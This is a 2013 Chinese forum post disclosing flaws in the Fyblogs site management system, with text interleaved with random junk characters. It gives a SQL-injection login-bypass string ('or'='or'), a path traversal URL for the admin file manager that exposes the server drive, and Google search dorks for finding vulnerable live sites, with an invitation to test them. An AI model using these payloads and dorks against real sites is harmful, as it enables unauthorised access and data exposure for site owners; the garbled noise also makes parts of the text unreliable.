漏洞类型: 未授权访问/权限绕过% I, `( C; G$ u+ W
/ C! I3 j5 T. y2 y7 F& @. v1 H d1 L
简要描述:
2 l, Z& N( e' P. s
; l0 C% m% X4 M, U6 @9 {+ YFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
, e4 b; z O6 }: s/ `1 C4 y- Q% \$ D, A$ G
详细说明:8 M- i$ E. ]6 e
$ G! p" J5 G3 s3 m/ R9 [" T3 ]$ Y后台万能密码 'or'='or'
* J" Z% Z0 T( j( X后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!0 ?( r( ~9 P% N, x2 p2 f' G* b
admin/uploadfile.asp?currentFolder=/upfiles/../
3 M/ Q5 K% b% O$ ]3 ]3 Z V# h! `- G$ M; X) M
漏洞证明:
g& j9 U9 `' Z5 e6 e1 J O
! n8 W. X y& ?6 p' l+ O% I( a谷歌:inurl:type.asp?id=1 新闻中心
# q; B u8 K, v* Z* w! C或者 :inurl:download_ok.asp?3 w; S8 D! D( b
; y$ X% A" n6 d8 r可以测试0 N2 y# W- r9 \& [$ S6 B: M4 L/ R
; C0 r3 F7 a/ [8 r5 D5 X. V
( u7 S. U0 Q* Z
|
发表于 2013-3-7 13:07:46
收藏
支持
反对